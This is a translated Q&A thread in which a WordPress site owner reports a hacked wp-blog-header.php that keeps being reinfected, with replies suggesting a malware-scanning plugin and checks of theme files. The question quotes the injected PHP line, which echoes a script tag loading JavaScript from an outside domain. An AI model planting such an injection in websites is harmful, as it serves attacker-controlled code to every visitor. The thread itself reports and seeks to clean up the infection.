我的wordpress网站被黑了

Question

因为某些原因，我的网站被黑了。

我检查了我的FTP文件，我注意到wp-blog-header.php最近被修改了。

这是我被黑之前的wp-blog-header.php：

<?php  
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . '/wp-load.php' );

    wp();

    require_once( ABSPATH . WPINC . '/template-loader.php' );

}

这是我被黑客入侵后的文件：

<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 
/**
 * Loads the WordPress environment and template.
...

因此，他们在我的文件中添加了这一行：

echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 

当我删除这一行时，我的网站运行良好，但几个小时后，他们又添加了这一行。我检查了我的数据库行，但我没有发现任何错误。在我看来，这是一个新的失败。我昨天用谷歌搜索了一下，我找不到太多，只有一些法国网站说他们对这个问题没有任何明确的解决方案。那么，以前有没有人经历过呢？

这些是我在这个站点中使用的插件和它们各自的版本：

WordPress v4.1.8
Advanced Custom Fields v4.0.0

Answer 1

使用插件反恶意软件GOTMLS.NET https://wordpress.org/plugins/gotmls/它已经为我们解决了完全相同的问题，到目前为止还不错，几乎24小时都没有看到脚本。

Answer 2

wp-blog-header.php不是唯一受此恶意软件影响的文件。检查你的footer.php (你的主题文件)。

我还没有弄清楚它是如何感染wp安装的。不过，我还在努力。

Answer 3

也发生在我身上。幸运的是，我刚刚安装了一个安全插件，它提醒我一个我知道的未经授权的登录，我现在正在调查，并将在这里再次更新。